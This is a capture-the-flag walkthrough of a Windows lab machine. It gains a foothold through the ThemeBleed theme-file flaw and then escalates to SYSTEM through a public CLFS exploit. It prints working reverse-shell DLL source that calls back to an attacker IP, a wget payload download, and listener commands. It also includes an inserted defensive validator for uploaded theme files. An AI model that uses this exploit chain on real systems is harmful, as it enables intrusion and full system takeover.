# Aero

## Box info

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FbXx3IOry9niHbKMwM2HJ%2FAero.png?alt=media&#x26;token=525610aa-dff2-41a2-a232-abffc8c716b5" alt="" width="563"><figcaption></figcaption></figure>

## Enumeration

### Nmap

Let's start by enumerating ports using `Nmap`:

```
szczygielka@hacks$  nmap -sVC -p- 10.129.229.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 18:40 EST
Nmap scan report for 10.129.229.128
Host is up (0.037s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Aero Theme Hub
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.49 seconds
```

The scan shows that only port 80 is open, served by `Microsoft-IIS/10.0`.

### Exploring website

After entering the IP address of the machine in the browser, we get the following page:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FTNB8b4SorfeA2EfYzqz2%2Fimage.png?alt=media&#x26;token=656d810b-5346-402c-8273-6a580f044542" alt=""><figcaption></figcaption></figure>

The description on the webpage indicates that the website is intended to allow users to upload themes for `Windows 11` operating system:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FfdxILCh5dp0ADDyFu9AE%2Fimage.png?alt=media&#x26;token=64c2ea13-38cd-4b58-ad79-53b24aa85742" alt=""><figcaption></figcaption></figure>

According to Microsoft [documentation](https://learn.microsoft.com/en-us/windows/win32/controls/themesfileformat-overview), Windows themes use the `.theme` or `.themepack` extension. Now let's move on to file transfers:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FdhOyKugkIWQAB4po4Z6X%2Fimage.png?alt=media&#x26;token=5cf2e009-5b72-495b-b8db-3aa1a48df122" alt=""><figcaption></figcaption></figure>

Let's find an example `.theme` file, in our case `aero.theme`, and upload it to the webpage:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FqvXwlhvxjveZooAPdcYR%2Fimage.png?alt=media&#x26;token=a1b1b77b-588c-49bd-beba-03fa81bd689a" alt=""><figcaption></figcaption></figure>

The file upload seems to work fine. Attempts to upload a file with an extension other than `.theme` or `.themepack` fail:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FoT1YMOnXHNOyZn0BVKFT%2Fimage.png?alt=media&#x26;token=20482150-f651-4b02-8ad8-d6b435202f3b" alt=""><figcaption></figcaption></figure>

Let's search the Internet for vulnerabilities related to theme files.

### CVE-2023-38146

The search results lead us to CVE-2023-38146, which may occur in the Windows 11 operating system. The [documentation](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-38146) on Microsoft's website shows that this vulnerability may lead to remote code execution. It can be exploited by loading a Windows theme file that references an attacker-controlled SMB share.
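From the defender's side, the extension check seen above is not a sufficient control, because what makes a ThemeBleed theme dangerous is not its extension but the path values inside it: a `.theme` file is a plain INI file, and the exploit works by pointing Windows at an attacker-controlled SMB share. The following validator, added here as an example and not taken from the write-up or from the ThemeBleed repository, parses an uploaded theme the way an upload handler could and rejects any value that references a UNC path or a URL. The two sample themes and the `203.0.113.10` address are constructed for the example.

```python
"""Server-side validator for uploaded Windows .theme files.

Added example; this is not code from the write-up, from ThemeBleed, or from
any project the write-up cites. A .theme file is an INI-style text file, so
an upload handler that only checks the extension still accepts a file that
points Windows at an attacker-controlled SMB share. This validator parses the
INI and rejects any value that references a UNC path or a URL.
"""
import configparser
import re
from typing import List, Tuple

Finding = Tuple[str, str, str, str]  # (section, key, value, reason)

# Checked in order; the first match decides the reason reported for a value.
REMOTE_PATTERNS = (
    (re.compile(r"\b[a-z][a-z0-9+.\-]*://", re.I), "URL"),        # http://, smb://, file://
    (re.compile(r"\\\\[^\\]"), "UNC path"),                        # \\host\share, \\?\UNC\host\share
    (re.compile(r"(?<![\w:])//[^/]"), "forward-slash UNC path"),  # //host/share
)


def decode_theme_bytes(raw: bytes) -> str:
    """Theme files are commonly saved as UTF-16 with a BOM; fall back to UTF-8 (BOM optional)."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse .theme text with settings that match how real theme files are written."""
    cp = configparser.ConfigParser(
        interpolation=None,   # values contain %SystemRoot%; BasicInterpolation would reject them
        strict=False,         # real theme files sometimes repeat a key or a section
        allow_no_value=True,  # and occasionally carry a bare key
    )
    cp.read_string(text)
    return cp


def scan_theme(text: str) -> List[Finding]:
    """Return every (section, key, value, reason) whose value would make Windows fetch a remote resource."""
    findings: List[Finding] = []
    cp = parse_theme(text)
    for section in cp.sections():
        for key, value in cp.items(section):
            if not value:
                continue
            for pattern, reason in REMOTE_PATTERNS:
                if pattern.search(value):
                    findings.append((section, key, value, reason))
                    break
    return findings


def is_safe_theme(text: str) -> bool:
    """Fail closed: a file that does not parse as INI is rejected, not waved through."""
    try:
        return not scan_theme(text)
    except configparser.Error:
        return False


# Constructed samples (not the files from the write-up).
BENIGN_THEME = r"""; constructed sample
[Theme]
DisplayName=Aero sample

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor

[MasterThemeSelector]
MTSM=DABJDKT
"""

REMOTE_THEME = r"""[Theme]
DisplayName=Looks legitimate

[Control Panel\Desktop]
Wallpaper=http://203.0.113.10/wall.jpg

[VisualStyles]
Path=\\203.0.113.10\themes\aero.msstyles
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_THEME), ("remote", REMOTE_THEME)):
        print(f"{name}: safe={is_safe_theme(sample)}")
        for section, key, value, reason in scan_theme(sample):
            print(f"  [{section}] {key} = {value}  <- {reason}")
```

Running the script reports the benign sample as safe and flags both values of the remote sample (the wallpaper URL and the UNC `Path` under `[VisualStyles]`). Anything that fails to parse as INI is rejected rather than accepted, and `decode_theme_bytes` handles the UTF-16 encoding in which Windows typically saves theme files, so the check is not bypassed by an encoding the handler did not expect.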

## Exploitation

We do not know which version of Windows we are dealing with, but search results indicate that `Microsoft-IIS/10.0` was introduced with `Windows Server 2016` and `Windows 10`, so the operating system may also be `Windows 11`. Let's look for an exploit for the vulnerability we found.

**PoC**

The code exploiting the vulnerability can be found in the following repository:

{% embed url="https://github.com/gabe-k/themebleed" fullWidth="false" %}

Let's download the release of this repository first. The `ThemeBleed.zip` file we downloaded contains the following files:

```
szczygielka@hacks$ find . -type f -exec file {} \;
./ThemeBleed.pdb: MSVC program database ver 7.00, 512*95 bytes
./ThemeBleed.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./SMBLibrary.Win32.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
./data/stage_1: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_2: PE32+ executable (DLL) (console) x86-64, for MS Windows, 2 sections
./data/stage_3: PE32+ executable (DLL) (console) x86-64, for MS Windows, 7 sections
./SMBLibrary.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
```

The README indicates that `ThemeBleed.exe` can do three things: start the server, generate a `.theme` file referencing a specific host, or generate a `.themepack` file referencing a specific host. There are three binary files in the `data` directory: `stage_1`, `stage_2` and `stage_3`. To create our payload we have to build a DLL that exports a function named `VerifyThemeVersion`, and replace `stage_3` with the library we created.

We want to create a DLL with a payload that gives us a reverse shell. To build it we switch from the Linux VM to a Windows VM with Visual Studio installed. A walkthrough on creating your own DLL with Visual Studio can be found [here](https://learn.microsoft.com/en-us/cpp/build/walkthrough-creating-and-using-a-dynamic-link-library-cpp?view=msvc-170).

Let's open `Visual Studio`, select `Create new project` and then choose `Dynamic-Link Library (DLL)`:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2Fdh0ehkrMfY1UGcluR8Ln%2Fimage.png?alt=media&#x26;token=460f2459-04b1-40e6-9e1b-d1ea45e0fc54" alt=""><figcaption></figcaption></figure>

Let's name our solution `stage_3`. After creating the solution we should have the following files:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2F1HSgtLJoQfF1uq24mwAc%2Fimage.png?alt=media&#x26;token=8841f6ff-5365-489b-b0f8-63d551562d27" alt=""><figcaption></figcaption></figure>

Let's add the `rev_shell.cpp` and `rev_shell.h` files to our project. After adding them, the project structure should look like this:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2Fx2WSn9U00Vg1DXotFRMB%2Fimage.png?alt=media&#x26;token=9381aeff-d276-4725-80fb-1ad82bfbcfc1" alt=""><figcaption></figcaption></figure>

According to the exploit repository, we should export the `VerifyThemeVersion` function from our `rev_shell.h` file. Information on how to do that can be found on the [Microsoft webpage](https://learn.microsoft.com/en-us/cpp/build/exporting-from-a-dll-using-declspec-dllexport?view=msvc-170). After adding the export, `rev_shell.h` should look as follows:

```
#pragma once
extern "C" __declspec(dllexport) int VerifyThemeVersion(void);
```

Let's include `rev_shell.h` in the `pch.h` file. The `pch.h` file after including the header file:

```
// pch.h: This is a precompiled header file.
// Files listed below are compiled only once, improving build performance for future builds.
// This also affects IntelliSense performance, including code completion and many code browsing features.
// However, files listed here are ALL re-compiled if any one of them is updated between builds.
// Do not add files here that you will be updating frequently as this negates the performance advantage.

#ifndef PCH_H
#define PCH_H

// add headers that you want to pre-compile here
#include "framework.h"
#include "rev_shell.h"

#endif //PCH_H
```

Let's move to the `rev_shell.cpp` file. First, we need C++ code that gives us a reverse shell. In this case, we will use the code from the following repository:

{% embed url="https://github.com/tudorthe1ntruder/reverse-shell-poc/tree/master" %}

After adapting the code to our problem, the `rev_shell.cpp` code looks as follows:

```
#include "pch.h"
#include <stdio.h>
#include <string.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include "rev_shell.h"

#pragma comment(lib, "Ws2_32.lib")

#define REMOTE_ADDR "10.10.16.15"
#define REMOTE_PORT "443"


int VerifyThemeVersion(void)
{
	FreeConsole();
	WSADATA wsaData;
	int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	struct addrinfo* result = NULL, * ptr = NULL, hints;
	memset(&hints, 0, sizeof(hints));
	hints.ai_family = AF_UNSPEC;
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_protocol = IPPROTO_TCP;
	getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result);
	ptr = result;
	SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, NULL, NULL);
	connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));
	si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = (HANDLE)ConnectSocket;
	si.hStdOutput = (HANDLE)ConnectSocket;
	si.hStdError = (HANDLE)ConnectSocket;
	TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE");
	CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
	WaitForSingleObject(pi.hProcess, INFINITE);
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	WSACleanup();
	return 0;
}
```

The exploit from GitHub starts an SMB server on port 445. Therefore, before starting the server, we should check whether this port is already in use. We can check it with the following command:

```
PS C:\Users\Szczygielka\Documents> netstat -aon | findstr 445
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4
```

To free port 445 we need to set the startup type of the `Server` Windows service to `Disabled` and reboot the Windows VM. After that, we can prepare the malicious theme `aero.theme` with the following command:

{% code fullWidth="false" %}

```
PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe make_theme 10.10.16.15 aero.theme
```

{% endcode %}

Let's start the server:

```
PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started
```

And let's run the listener:

```
PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222
```

Now upload the prepared `aero.theme` file to the webpage:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FxMTamKDcEYgadBgnPRUQ%2Fimage.png?alt=media&#x26;token=e52db36e-ba8e-4213-b9e8-a60e1b1cd546" alt=""><figcaption></figcaption></figure>

In the console with the server running, we can see that the `stage_3` library has been loaded:

```
PS C:\Users\Szczygielka\Documents\ThemeBleed> .\ThemeBleed.exe server
Server started
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 1 - Version check
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 2 - Verify signature
Client requested stage 3 - LoadLibrary
```

Let's check if we managed to get the reverse shell:

```
PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 2222
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:2222
Ncat: Connection from 10.129.229.128:49679.
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

Success! We received a reverse shell as the user `sam.emerson`:

```
C:\Windows\system32>whoami
whoami
aero\sam.emerson
```

### User flag

The user flag can be obtained from `C:\Users\sam.emerson\Desktop\user.txt`.

## Privilege escalation

In the `Documents` folder of the `sam.emerson` user we find a PDF file whose name refers to a CVE:

```
C:\Users\sam.emerson\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is C009-0DB2

 Directory of C:\Users\sam.emerson\Documents

09/21/2023  01:58 PM    <DIR>          .
09/20/2023  04:08 AM    <DIR>          ..
09/21/2023  08:18 AM            14,158 CVE-2023-28252_Summary.pdf
09/26/2023  12:06 PM             1,113 watchdog.ps1
               2 File(s)         15,271 bytes
               2 Dir(s)   6,129,287,168 bytes free
```

The easiest way to retrieve the `CVE-2023-28252_Summary.pdf` file is to encode it as `Base64` and decode it with `CyberChef`. Let's switch the console to PowerShell and encode the file with the following command:

```
PS C:\Users\sam.emerson\Documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
```

Use `CyberChef` to decode it from `Base64`:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FCtsZTzzcIBitF6CfByXB%2Fimage.png?alt=media&#x26;token=a1c7caf1-47ff-43f3-ad4a-eb68f8b3c0ab" alt=""><figcaption></figcaption></figure>

Now save the file as `CVE-2023-28252_Summary.pdf`. Let's check its contents:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FWS1D2k1HgoaGNbUmXWRG%2Fimage.png?alt=media&#x26;token=e3630faa-cda7-4671-b9bf-ace6f2fa319e" alt=""><figcaption></figcaption></figure>

The PDF contains information about `CVE-2023-28252`, exploitation of which may lead to privilege escalation. The document also mentions a security patch released by Microsoft in April 2023. Internet search [results](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252) indicate that the patch for this vulnerability was released on April 11, 2023, and that Windows 11 may also be vulnerable.

Let's look for an exploit for this vulnerability:

{% embed url="https://github.com/fortra/CVE-2023-28252" %}

Let's download the contents of the repository to the attacking virtual machine and open the solution using `Visual Studio`:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2Fki2F3wEIacoZpBPf7LvP%2Fimage.png?alt=media&#x26;token=b44bfdeb-81eb-441a-86ea-02e8cd315318" alt=""><figcaption></figcaption></figure>

The solution contains only one `.cpp` file, `clfs_eop.cpp`. Let's analyze its code:

<figure><img src="https://1764482864-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsK05LA2NAjKs68dl8qHP%2Fuploads%2FPaCIHlTqX9eZMdvdFxSi%2Fimage.png?alt=media&#x26;token=96fe1ab1-ac9c-4a86-b08e-d85fc8eb8bc7" alt=""><figcaption></figcaption></figure>

At the end of the file, we can see that `notepad.exe` is executed if the privilege escalation succeeds. We want to change this payload so that it gives us a reverse shell as the `system` user. In this case, we will use the `PowerShell #3 (Base64)` payload from [this](https://www.revshells.com/) website. Don't forget to change the IP address and port number. Let's paste the reverse shell into the code in place of `notepad.exe`, and build the project in the `Release` configuration.

Now let's go to the directory containing the compiled executable `clfs_eop.exe` and start a Python HTTP server:

```
PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...
```

Let's move to the target machine and download `clfs_eop.exe` with the following command:

```
wget http://10.10.16.15:10000/clfs_eop.exe -OutFile clfs_eop.exe
```

The file was downloaded:

```
PS C:\Users\Szczygielka\Documents\CVE-2023-28252-master\x64\Release> python -m http.server 10000
Serving HTTP on :: port 10000 (http://[::]:10000/) ...
::ffff:10.129.229.128 - - [23/Feb/2024 15:46:07] "GET /clfs_eop.exe HTTP/1.1" 200 -
```

Let's prepare the listener:

```
PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080
```

And let's execute `clfs_eop.exe` on the target machine:

```
PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10
```

In the listener, we received a connection:

```
PS C:\Users\Szczygielka\Documents> .\ncat.exe -lnvp 8080
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 10.129.229.128:65249.
PS C:\Users\sam.emerson>
```

Let's check which user we are:

```
PS C:\Users\sam.emerson> whoami
nt authority\system
```

### Root flag

The root flag can be obtained from `C:\Users\Administrator\Desktop\root.txt`.
